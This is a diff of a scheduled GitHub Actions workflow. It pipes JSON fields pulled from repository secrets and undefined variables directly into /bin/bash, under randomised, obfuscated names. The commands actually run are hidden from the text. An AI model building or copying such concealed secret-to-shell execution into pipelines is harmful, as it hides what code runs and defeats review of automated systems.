--- a/.github/workflows/shenbangding.yml
+++ b/.github/workflows/shenbangding.yml
@@ -3,7 +3,7 @@ name: shenbangding
 on:
   workflow_dispatch:
   schedule:
-    - cron: '13 2/6 * * *'
+    - cron: '11 3/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -12,18 +12,10 @@ jobs:
       - uses: actions/checkout@v4
       - name: shenbangding
         env:
-          vdv68945: ${{ secrets.vdv68945 }}
+          meqh35: ${{ secrets.meqh35 }}
         run: |
-          echo $vdv68945 | jq -r .g8 | /bin/bash
-          echo $q5 | jq -r .odgc567 | /bin/bash
-          echo $ipgkh8 | jq -r .ufb88860 | /bin/bash
-          echo $i061 | jq -r .o70 | /bin/bash
-          echo $irsf4561 | jq -r .jl17502 | /bin/bash
-          echo $quy3069 | jq -r .smke80474 | /bin/bash
-          echo $cmat2 | jq -r .q6882 | /bin/bash
-          echo $kxw56494 | jq -r .dgsfd11 | /bin/bash
-          echo $ry7769 | jq -r .ttos5627 | /bin/bash
-          echo $xnia8303 | jq -r .xxjaz2901 | /bin/bash
-          echo $bj4506 | jq -r .v338 | /bin/bash
-          echo $ig8 | jq -r .kf5 | /bin/bash
+          echo $meqh35 | jq -r .kbfh53082 | /bin/bash
+          echo $cgh8 | jq -r .jwo392 | /bin/bash
+          echo $b0 | jq -r .oqvk4 | /bin/bash
+          echo $by206 | jq -r .pru32 | /bin/bash
 
